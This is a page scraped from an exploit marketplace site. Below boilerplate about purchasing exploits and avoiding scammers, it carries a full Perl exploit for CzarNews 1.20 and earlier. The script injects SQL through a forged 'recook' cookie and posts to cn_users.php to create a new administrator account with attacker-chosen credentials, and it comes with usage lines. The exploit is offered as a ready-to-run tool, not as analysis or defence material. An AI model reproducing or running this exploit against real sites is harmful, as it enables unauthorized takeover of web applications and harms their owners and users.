0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CzarNews <= 1.20 (Cookie) Remote SQL Injection Exploit
====================================================== CzarNews <= 1.20 (Cookie) Remote SQL Injection Exploit ====================================================== #!/usr/bin/perl # ---------------------------------------------------------- # CzarNews <= v1.20 (Cookie) Remote SQL Injection Exploit # Perl Exploit - Add a new admin with your credentials! # Discovered On: 15/09/2008 # Discovered By: StAkeR # ---------------------------------------------------------- # Usage: perl http://localhost/cms StAkeR obscure # ---------------------------------------------------------- use strict; use LWP::UserAgent; my $email = 'some@example.net'; my ($hostname,$username,$password) = @ARGV; my $request = undef; my $http_s = new LWP::UserAgent or die $!; $hostname = ($hostname =~ /^http:\/\/(.+?)$/) ? $ARGV[0] : banner(); banner() unless $username and $password; $http_s->agent("Mozilla/4.5 [en] (Win95; U)"); $http_s->timeout(1); $http_s->default_header('Cookie' => "recook=' or '1=1,' or '1=1"); $request = $http_s->post($hostname."/cn_users.php", [ user => $username, pass => $password, email => $email, allcats => "all", admin => "off", news => "on", images => "on", users => "on", categories => "on", config => "on", words => "on", op => "add", id => '', go => "true", submit => "Add+User" ]); if($request->is_success) { if($request->content =~ /has been added/i) { print "[+] Added New Administrator: $username & $password\n"; } else { print "[!] Exploit Failed!\n"; print "[!] Site Not Vulnerable\n"; } } sub banner { print "[+] CzarNews <= v1.20 Remote SQL Injection Exploit (add new admin)\n"; print "[+] Usage: perl exploit.pl [host] [username] [password]\n"; return exit; } # 0day.today [2024-11-14] #